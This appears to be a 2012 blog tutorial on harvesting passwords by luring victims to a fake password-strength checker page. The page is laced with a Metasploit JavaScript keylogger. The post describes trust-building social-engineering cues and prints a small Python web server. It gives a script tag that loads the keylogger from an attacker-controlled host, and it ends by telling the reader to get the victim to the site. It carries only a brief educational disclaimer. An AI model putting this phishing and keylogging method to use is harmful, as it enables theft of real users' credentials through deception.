Friday, June 29, 2012

How Fast Can Your Password Be Cracked?

   
Instantly with a JavaScript keylogger.

Okay, so we aren't actually going to crack your password. In this brief tutorial, we show you how we can use the Metasploit JavaScript Keylogger auxiliary module in a penetration testing phishing campaign or user awareness training. First, we need a couple of items before we get some passwords.

  • A webserver (example below)
  • A webpage with a password form
  • JavaScript hook.
  • Metasploit

You could launch this attack via cross site scripting however, here we will use a page based on howsecureismypassword.net to lure a person to checking how strong their password is.




In the screenshot above we can see a couple of social engineering tricks at work. Key items to note are “help users”, “never sent” and the list of helpful tips. These items reinforce trust in the victim. Next the user will most likely test the password field to see how the website responds, and we have a fully functional password checking system. 


The site responds with approximately how long it would take to crack this password on a standard desktop PC without GPU cracking. But we don’t need to wait 5 million years or even 5 seconds. As you can see below each keystroke was captured by the keylogger. 


 
How did we do it?
Simple we used a seven line python webserver:
               
1:  import SimpleHTTPServer  
2:  import SocketServer  
3:    
4:  handler = SimpleHTTPServer.SimpleHTTPRequestHandler  
5:  httpd = SocketServer.TCPServer(('0.0.0.0', 80), handler)  
6:  print "Server Started."  
7:  httpd.serve_forever()  
8:    

Now our victim can connect to our “helpful” website. Then we need a webpage to put our JavaScript keylogger into(find or make your own). Next we put the javascript in the source code of our html like so:<script type=”text/javascript” src=http://your_ip_or_hostname/anything.js”></script> .  
 Finally, we start the Metasploit auxiliary module.  The options in the module depend on your environment setup. 


 
That’s it! It’s your job to get the victim to the site.
This is intended for informational and/or educational purposes only; I am not responsible for your actions.

No comments:

Post a Comment